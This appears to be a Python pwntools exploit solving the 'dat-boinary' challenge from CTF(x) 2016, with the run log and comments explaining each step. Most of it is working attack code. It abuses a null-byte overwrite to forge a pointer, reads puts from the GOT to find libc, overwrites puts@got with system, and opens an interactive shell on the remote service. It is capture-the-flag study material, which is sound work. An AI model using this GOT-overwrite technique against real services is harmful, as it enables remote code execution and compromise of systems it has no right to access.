CTF(x) 2016 dat-boinary
#!/usr/bin/python2
# [+] Opening connection to 172.28.128.3 on port 1338: Done
# [*] Smash null byte
# [*] Reading from memory
# [*] Leaked puts@glibc at 0xb7665650
# [*] system@glibc is at 0xb7640190
# [*] Overwriting puts@got with system@glibc
# [*] Triggering
# [*] Switching to interactive mode
from pwn import *
context.update(arch='i386', os='linux')  # pwntools target description; the p32()/u32() helpers below take their defaults from it
def smash(r):
    """Run the "Smash null byte" step of the write-up on the open tube *r*.

    Sends a 9-byte id, skips to the main menu, picks option 5 and waits for
    the ``secret`` marker.  What the 9-byte id achieves is not visible in
    this script: the log label suggests it is one byte longer than the id
    field and clobbers its terminating NUL (assumption — confirm against
    the binary).  Returns None.
    """
    r.recvuntil("Before we start, please give your meme an id")
    r.send("a" * 9)
    # Consume the menu banner up to the input prompt.
    for marker in ("What would you like to do?", "==> "):
        r.recvuntil(marker)
    # An empty line first, then menu option 5.
    for line in ("", "5"):
        r.sendline(line)
    r.recvuntil("\nsecret")
def read_from_memory(r, addr):
    """Return what the service prints after its content is pointed at *addr*.

    Menu option 1 re-enters the meme id; the id sent is a 12-byte pad, the
    packed 32-bit *addr* and 7 filler bytes.  Option 4 then prints the
    "content", and everything between the ``Ur meme c0nT3nT:`` marker and
    the next prompt is returned (the caller unpacks the first 4 bytes).
    NOTE(review): that the 12-byte offset lands on a content pointer is
    inferred from how the result is used, not visible here — confirm
    against the binary.
    """
    r.recvuntil("==> ")
    r.sendline("1")
    r.recvuntil("3nt3r ur m3m3 id")
    forged_id = "".join(["A" * 12, p32(addr), "B" * 7])
    r.sendline(forged_id)
    r.sendline("4")
    r.recvuntil("Ur meme c0nT3nT:\t")
    return r.recvuntil("==> ")
def write_in_memory(r, addr, data):
    """Store *data* at *addr* through the service's menu.

    Same id layout as read_from_memory (option 1); option 2 then sets the
    length to ``len(data) + 1`` (presumably room for a terminator) and
    option 3 supplies the content, which the service presumably copies
    through the pointer.  Unlike read_from_memory this does not wait for
    a prompt first: the caller's preceding read already consumed it.
    Returns None.
    """
    forged_id = "".join(["A" * 12, p32(addr), "B" * 7])
    r.sendline("1")
    r.recvuntil("3nt3r ur m3m3 id")
    r.sendline(forged_id)
    r.recvuntil("==> ")
    r.sendline("2")
    r.recvuntil("3nt3r teh d4nkn3ess 0f m3me")
    r.sendline(str(len(data) + 1))
    r.recvuntil("==> ")
    r.sendline("3")
    r.sendline(data)
if __name__ == "__main__":
    # All constants are specific to the challenge binary and its libc build.
    # The fixed GOT address implies the binary was built without PIE, and
    # the transcript in the header shows the GOT is writable (no full
    # RELRO) — the two mitigations that would have stopped this sequence.
    PUTS_GOT = 0x8049118       # puts@got.plt
    PUTS_OFFSET = 0x65650      # puts offset inside the target libc
    SYSTEM_OFFSET = 0x40190    # system offset inside the target libc

    r = remote("172.28.128.3", 1338)
    # The original also carried the event endpoint, commented out:
    # r = remote("problems.ctfx.io", 1338)

    log.info("Smash null byte")
    smash(r)

    # Leak the resolved puts address from the GOT, then rebase libc.
    log.info("Reading from memory")
    leaked = read_from_memory(r, PUTS_GOT)
    puts_leak = u32(leaked[:4])
    log.info("Leaked puts@glibc at %#x" % puts_leak)

    libc_base = puts_leak - PUTS_OFFSET
    system_addr = libc_base + SYSTEM_OFFSET
    log.info("system@glibc is at %#x" % system_addr)

    log.info("Overwriting puts@got with system@glibc")
    write_in_memory(r, PUTS_GOT, p32(system_addr))

    # Option 5 presumably calls puts on attacker-chosen text; with the GOT
    # entry redirected that becomes system() (inferred from the transcript).
    log.info("Triggering")
    r.recvuntil("==>")
    r.sendline("5")
    r.recvuntil("whaddup!")
    r.interactive()